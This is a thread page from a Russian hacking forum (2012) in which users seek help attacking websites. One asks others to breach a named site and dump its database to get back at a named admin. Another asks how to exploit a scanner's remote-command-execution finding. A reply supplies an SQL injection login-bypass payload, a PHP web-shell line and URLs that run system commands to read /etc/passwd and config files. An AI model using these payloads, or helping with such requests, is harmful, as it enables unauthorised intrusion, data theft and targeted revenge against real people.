Вопросы по уязвимостям

УСТРАНЕНИЕ КОНКУРЕНТОВ. БЛОКИРОВКА ДОМЕНОВ, БЛОКИРОВКА ИНСТАГРАМ/ТЕЛЕГРАМ И ДРУГОЕ. ПРОВЕРЕННЫЙ СЕЛЛЕР.

НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ

Скрыть

		ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
Вопросы по уязвимостям

Страница 20 из 38

« Первая

Последняя »

Опции темы

Поиск в этой теме

Опции просмотра

#191

19.08.2012, 01:00

Syndicate

Постоянный

Регистрация: 28.04.2012

Сообщений: 462

С нами: 7389686

Репутация: -6

Помогите пожалуйста,поищите дыры на этом сайте: http://icq-halyava.com/ сайт самописка,кто найдёт дыры или способ как можно бд слить отпишитесь в теме пожалуйста, просто админ этого сайта кинул меня на большие деньги, админа кстате зовут Юрий Корнилов так же известный под логином yirik24 вообшем кто чем может помочь по этому сайту отпишитесь

#192

19.08.2012, 01:00

aim+faster

Познающий

Регистрация: 04.05.2011

Сообщений: 86

С нами: 7908086

Репутация: 7

delete

#193

19.08.2012, 01:00

kir2914

Познающий

Регистрация: 08.01.2011

Сообщений: 34

С нами: 8075126

Репутация: 0

Недавно просканировал Xspiderom один сайтик и нашел уязвимость "Удаленное выполнение команд" на порту 8080. IMAGE http://imglink.ru/pictures/19-08-12/ca81f43e385ebe1160ef00cf7c0761d1.jpg
Насколько я понимаю, уязвимость серьезная. Только вот, что делать? Как ее использовать?

#194

19.08.2012, 01:00

drmorgan

Постоянный

Регистрация: 02.02.2010

Сообщений: 466

С нами: 8564726

Репутация: 52

Цитата:

Сообщение от kir2914

Недавно просканировал Xspiderom один сайтик и нашел уязвимость "Удаленное выполнение команд" на порту 8080. IMAGE http://imglink.ru/pictures/19-08-12/ca81f43e385ebe1160ef00cf7c0761d1.jpg
Насколько я понимаю, уязвимость серьезная. Только вот, что делать? Как ее использовать?

Она позволяет удаленному пользователю выполнить команды операционной системы на целевой системе. Сценарии 'add_comments.php' и 'functions.php' не проверяют данные, представленные пользователем. Удаленный пользователь может послать специально обработанные данные, чтобы создать произвольный файл с произвольным расширением и произвольным содержанием. Удаленный пользователь может эксплуатировать эту уязвимость, чтобы загрузить PHP файл и затем заставить Web сервер выполнить PHP код.

#195

19.08.2012, 01:00

kir2914

Познающий

Регистрация: 08.01.2011

Сообщений: 34

С нами: 8075126

Репутация: 0

Ок. Как это реализовать?

#196

19.08.2012, 01:00

drmorgan

Постоянный

Регистрация: 02.02.2010

Сообщений: 466

С нами: 8564726

Репутация: 52

Цитата:

Сообщение от kir2914

Ок. Как это реализовать?

Это инъекция , посмотри на форуме тут полно статей, тут в двух словах не отпишешся надо целую статью писать.

Удаленный пользователь может с помощью специально сформированного запроса выполнить произвольные SQL команды на целевой системе.

Пример:

user: ' or isnull(1/0) /*
pass: whatever

Получив административные привилегии, злоумышленник может отредактировать специальным образом глобальный шаблон '/templates/tpl_global.php'.

Пример:

//***********************************************

TEMPLATE;
}
}
system($HTTP _GET_VARS[command]);

И, затем, с помощью специально сформированного URL выполнить произвольные команды на целевой системе с привилегиями web сервера.

Примеры:

http://[target]/[path]//templates/tpl_global.php?command=ls%20-la

http://[target]/[path]/templates/TPL_GLOBAL.PHP?command= cat%20/etc/passwd

http://[target]/[path]/templates/TPL_GLOBAL.PHP?command= cat%20/[path_to_config_file]/data.inc.php

#197

24.08.2012, 01:00

M@ZAX@KEP

Участник форума

Регистрация: 11.06.2009

Сообщений: 159

С нами: 8903558

Репутация: 60

Какая нахрен SQL инъекция, ты наркоман что ли? Откуда вообще этот текст скопировал?
Там чёрным по белому написано, что на сервере возможно уязвимая версия апача. Даже ссылка на CVE соответствующий есть. Гугли сплойт.